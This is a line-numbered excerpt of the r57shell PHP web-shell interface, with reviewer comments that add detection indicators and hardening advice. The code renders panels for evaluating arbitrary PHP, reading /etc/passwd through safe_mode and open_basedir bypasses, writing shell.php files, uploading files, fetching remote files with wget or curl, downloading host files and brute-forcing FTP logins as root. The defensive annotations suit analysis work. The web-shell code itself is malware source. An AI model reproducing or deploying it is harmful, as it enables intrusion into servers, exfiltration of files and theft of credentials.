// cmd=php_eval and `dir`. The handler is outside this excerpt; the field name
// suggests the submitted text is evaluated as PHP - TODO confirm.
// NOTE(review): the default textarea text is a fixed string (it names
// "r57shell.php" and "/etc/passwd"), which makes it practical signature
// material for content scanning of the web root and of HTTP responses.
// NOTE(review): eval is a language construct, so disable_functions cannot
// switch it off; preventing untrusted PHP from reaching the document root is
// the control that matters.
6912echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
6913
6914echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
6915
6916echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
6917
6918echo "</textarea>";
6919
6920echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
6921
6922echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
6923
6924echo "</div></div></font>";
6925
6926echo $table_end1.$fe;
6927
6928
6929
6930if($safe_mode || $open_basedir)
6931
6932{
6933
6934echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
6935
6936echo "<table class=table1 width=100% align=center>";
6937
6938echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6939
6940echo $te.'</div>'.$table_end1.$fe;
6941
6942}
6943
6944
6945
// Web-shell UI: "test1" panel. Rendered only when a PHP file restriction is
// set, $curl_on is truthy (set outside this excerpt) and the running PHP is
// 5.2.0 or older: version_compare() with two arguments returns -1/0/1, so
// "<=0" means phpversion() <= "5.2.0". Submits `test1_file` (default
// "/etc/passwd") with hidden cmd=test1 and `dir`. Handler not visible here.
// NOTE(review): the version gates on this and the following panels make them
// inert on current PHP; seeing them rendered in a captured response is itself
// evidence that the host runs a long-unsupported interpreter.
6946if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
6947
6948{
6949
6950echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
6951
6952echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6953
6954echo $te.'</div>'.$table_end1.$fe;
6955
6956}
6957
6958
6959
// Web-shell UI: "test3" panel, rendered when a PHP file restriction is set and
// $mysql_on is truthy (set outside this excerpt). It pairs database connection
// details - `test3_md` (default "mysql"), `test3_ml` ("root"), `test3_mp`
// ("password"), `test3_port` ("3306") - with a file path `test3_file`
// (default "/etc/passwd") and hidden cmd=test3. Handler not visible here.
// NOTE(review): a form that combines DB credentials with a filesystem path
// presumably has the database server touch the file on the script's behalf -
// confirm against the handler. The matching controls are least-privilege
// application DB accounts without the FILE privilege, a restrictive
// secure_file_priv, and alerting on logins from the web tier with accounts the
// application itself never uses.
6960if(($safe_mode || $open_basedir) && $mysql_on)
6961
6962{
6963
6964echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
6965
6966echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
6967
6968echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6969
6970echo $te.'</div>'.$table_end1.$fe;
6971
6972}
6973
6974
6975
6976if(($safe_mode || $open_basedir) && $mysqli_on)
6977
6978{
6979
6980echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts;
6981
6982echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306"))));
6983
6984echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6985
6986echo $te.'</div>'.$table_end1.$fe;
6987
6988}
6989
6990
6991
// Web-shell UI: "test4" panel, rendered when a PHP file restriction is set and
// $mssql_on is truthy (set outside this excerpt). Connection fields:
// `test4_md` (default "master"), `test4_ml` ("sa"), `test4_mp` ("password"),
// `test4_port` ("1433"); hidden cmd=test4.
// Unlike the other DB panels, the second row is labelled with `_text3` - the
// same caption used for the free-text `cmd` field in the command panel - and
// `test4_file` defaults to "dir" rather than a path, so this field presumably
// carries a command rather than a filename. Handler not visible here.
// NOTE(review): relevant controls are on the database side - no application
// logins as `sa`, no web-tier reachability to SQL Server unless required, and
// alerting when the database service account spawns child processes.
6992if(($safe_mode || $open_basedir) && $mssql_on)
6993
6994{
6995
6996echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
6997
6998echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
6999
7000echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7001
7002echo $te.'</div>'.$table_end1.$fe;
7003
7004}
7005
7006
7007
7008
7009
7010if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
7011
7012echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
7013
7014echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7015
7016echo $te.'</div>'.$table_end1.$fe;
7017
7018}
7019
7020
7021
7022if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
7023
7024echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
7025
7026echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7027
7028echo $te.'</div>'.$table_end1.$fe;
7029
7030}
7031
7032
7033
7034if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
7035
7036echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
7037
7038echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7039
7040echo $te.'</div>'.$table_end1.$fe;
7041
7042}
7043
7044
7045
7046if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
7047
7048{
7049
7050echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
7051
7052echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
7053
7054echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7055
7056echo $te.'</div>'.$table_end1.$fe;
7057
7058}
7059
7060
7061
7062if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
7063
7064echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
7065
7066echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7067
7068echo $te.'</div>'.$table_end1.$fe;
7069
7070}
7071
7072
7073
7074if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
7075
7076echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
7077
7078echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7079
7080echo $te.'</div>'.$table_end1.$fe;
7081
7082}
7083
7084
7085
7086if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
7087
7088echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
7089
7090echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7091
7092echo $te.'</div>'.$table_end1.$fe;
7093
7094}
7095
7096
7097
7098if(($safe_mode || $open_basedir) && @function_exists('realpath') && @version_compare(@phpversion(),"5.2.4")<=0){
7099
7100$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
7101
7102"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
7103
7104"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
7105
7106echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
7107
7108echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7109
7110echo $te.'</div>'.$table_end1.$fe;
7111
7112}
7113
7114
7115
7116if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7117
7118{
7119
7120echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
7121
7122echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7123
7124echo $te.'</div>'.$table_end1.$fe;
7125
7126}
7127
7128
7129
7130if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7131
7132{
7133
7134echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
7135
7136echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7137
7138echo $te.'</div>'.$table_end1.$fe;
7139
7140}
7141
7142
7143
// Web-shell UI: "test13" panel. Rendered when a PHP file restriction is set,
// error_log() exists and PHP is 5.2.2 or older. The first row's caption is
// built from `_text65` + `_text59`, the same strings used for the "create" and
// "file" options of the create/delete panel; it takes a destination path
// `test13_file2` (default $dir."shell.php"). The second row takes content
// `test13_file1` (default "<? phpinfo(); ?>"). Hidden cmd=test13.
// The handler is outside this excerpt; gating on error_log() suggests that
// function is what produces the file - TODO confirm.
// NOTE(review): regardless of the mechanism, the observable outcome is a new
// .php file under the document root. File-integrity monitoring, a non-writable
// code tree, and no PHP execution in writable directories address that outcome
// directly.
7144if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
7145
7146{
7147
7148echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
7149
7150echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
7151
7152echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7153
7154echo $te.'</div>'.$table_end1.$fe;
7155
7156}
7157
7158
7159
7160if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7161
7162{
7163
7164echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
7165
7166echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
7167
7168echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7169
7170echo $te.'</div>'.$table_end1.$fe;
7171
7172}
7173
7174
7175
7176if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7177
7178{
7179
7180echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
7181
7182echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
7183
7184echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7185
7186echo $te.'</div>'.$table_end1.$fe;
7187
7188}
7189
7190
7191
7192if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
7193
7194{
7195
7196echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
7197
7198echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
7199
7200echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7201
7202echo $te.'</div>'.$table_end1.$fe;
7203
7204}
7205
7206
7207
7208if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7209
7210{
7211
7212echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
7213
7214echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7215
7216echo $te.'</div>'.$table_end1.$fe;
7217
7218}
7219
7220
7221
// Web-shell UI: "test17" panel. Rendered when a PHP file restriction is set,
// symlink() exists and PHP is 5.2.2 or older. Unlike the other panels there is
// no outer $fs/$fe pair: the table holds two independent forms, each wrapped
// in its own $fs ... $fe. The left form submits a path `test17_file` (default
// "/etc/passwd") with cmd=test17_1; the right form submits only `dir` with
// cmd=test17_2. Handlers are outside this excerpt.
// NOTE(review): given the symlink() gate this presumably works through
// symbolic links - TODO confirm. Defensive checks that follow from that:
// scan web-writable directories for symlinks whose targets resolve outside the
// document root, and configure the web server not to follow links it does not
// own (for Apache, SymLinksIfOwnerMatch instead of FollowSymLinks).
7222if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7223
7224{
7225
7226echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
7227
7228echo "<tr><td valign=top width=70%>".$ts;
7229
7230echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7231
7232echo $te."</td><td valign=top width=30%>".$ts;
7233
7234echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7235
7236echo $te."</td></tr>";
7237
7238echo $te.'</div>'.$table_end1;
7239
7240}
7241
7242
7243
7244if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7245
7246{
7247
7248echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
7249
7250echo "<tr><td valign=top width=70%>".$ts;
7251
7252echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7253
7254echo $te."</td><td valign=top width=30%>".$ts;
7255
7256echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7257
7258echo $te."</td></tr>";
7259
7260echo $te.'</div>'.$table_end1;
7261
7262}
7263
7264
7265
7266
7267
// Web-shell UI: single-file upload panel. Rendered when ini_get() is
// unavailable or the file_uploads ini setting is on. The form is opened
// literally (name=upload, method=POST, multipart/form-data) instead of via
// $fs. Fields: file input `userfile0`, checkbox `nf1`, text `new_name`, and
// `dir`; no hidden `cmd` is set. The handler is outside this excerpt.
// NOTE(review): multipart POSTs with a part named userfile0 addressed to a
// script the application does not ship are a usable request-level indicator.
// On the host side, writable directories that cannot execute PHP and
// file-integrity alerts on the code tree limit what an upload can achieve.
7268if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7269
7270echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7271
7272echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
7273
7274echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
7275
7276echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7277
7278echo $te.'</div>'.$table_end1.$fe;
7279
7280}
7281
7282
7283
7284
7285
// Web-shell UI: multi-file upload panel, gated by the same condition as the
// single-file panel (ini_get() missing or file_uploads on). It opens a second
// form that is also named "upload" and lays out fifteen file inputs,
// `userfile1` .. `userfile15`, in two table columns (1-8 and 9-15), plus `dir`.
// There is no rename field and no hidden `cmd`. Handler not visible here.
// NOTE(review): the numbered part names userfile1..userfile15 extend the
// request-level indicator from the single-file form; a rule keyed on the
// `userfile` prefix followed by digits covers both panels.
7286if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7287
7288echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7289
7290echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
7291
7292echo "<tr><td valign=top width=50%>".$ts;
7293
7294echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
7295
7296echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
7297
7298echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
7299
7300echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
7301
7302echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
7303
7304echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
7305
7306echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
7307
7308echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
7309
7310echo $te."</td><td valign=top width=50%>".$ts;
7311
7312echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
7313
7314echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
7315
7316echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
7317
7318echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
7319
7320echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
7321
7322echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
7323
7324echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
7325
7326echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7327
7328echo $te."</td></tr>";
7329
7330echo $te.'</div>'.$table_end1.$fe;
7331
7332}
7333
7334
7335
7336
7337
// Web-shell UI: remote-fetch panel, rendered only when $select_downloaders is
// non-empty. That markup is built outside this excerpt; the file's
// $downloaders list names wget, fetch, lynx, links, curl and get, so it is
// presumably a <select> of whichever of those were found on the host.
// Fields: the downloader choice, `rem_file` (default 'http://'), `loc_file`
// (default $dir.'/download.file') and `dir`; no hidden `cmd` is set here.
// NOTE(review): host and network telemetry are the useful detections - the
// web-server account spawning one of those client programs, or the web tier
// opening outbound HTTP connections it normally never makes. Default-deny
// egress from web servers removes the capability outright.
7338if($select_downloaders){
7339
7340 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
7341
7342 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
7343
7344 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7345
7346 echo $te.'</div>'.$table_end1.$fe;
7347
7348}
7349
7350
7351
// File-download panel: posts hidden cmd='download_file' with the path in 'd_name' (pre-filled with $dir).
// Defender note: this is the shell's file-exfiltration entry point; 'cmd=download_file' together with
// 'd_name' in a POST body is a stable indicator in request logs.
7352echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
7353
7354echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
7355
// $arh accumulates the optional 'compress' radio buttons; it is reused by the mail-file panel further down.
7356$arh = $lang[$language.'_text92'];
7357
// Each archive option is offered only if the matching PHP compression function exists on this host.
7358if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
7359
7360if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
7361
7362if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
7363
// 'none' is passed with a trailing 1, presumably marking it as the checked default -- confirm in in().
7364echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7365
7366echo $te.'</div>'.$table_end1.$fe;
7367
7368
7369
// FTP panels, rendered only when the PHP ftp extension is available (ftp_connect exists).
// Three side-by-side forms are emitted, distinguished by their hidden 'cmd' value:
//   'ftp_brute'     - fields ftp_server_port, brute_method ('passwd' or 'dic'), reverse, ftp_login, dictionary
//   'ftp_file_down' - fields ftp_server_port, ftp_login, ftp_password, ftp_file, loc_file, ftp_mode
//   'ftp_file_up'   - same fields as ftp_file_down
// Every text field is pre-filled from the previous $_POST value when present, otherwise from a
// hard-coded default. Whether in() escapes those values before output is not visible here.
// Defender note: the 'cmd' values above and the field name 'brute_method' are request-body indicators;
// on the network side the corresponding activity would be FTP connections originating from the web
// server process, by default towards 127.0.0.1:21.
7370if(@function_exists("ftp_connect")){
7371
7372echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7373
7374
7375
// Panel 1: cmd='ftp_brute'.
7376echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
7377
7378echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
7379
// Links back to this script with the '?users' query string; $_SERVER['PHP_SELF'] is concatenated as-is.
7380echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7381
7382echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7383
7384echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7385
7386echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
7387
// Dictionary path defaults to 'passw.dic' appended to the current directory.
7388echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7389
7390echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
7391
7392
7393
// Panel 2: cmd='ftp_file_down'.
7394echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7395
7396echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
7397
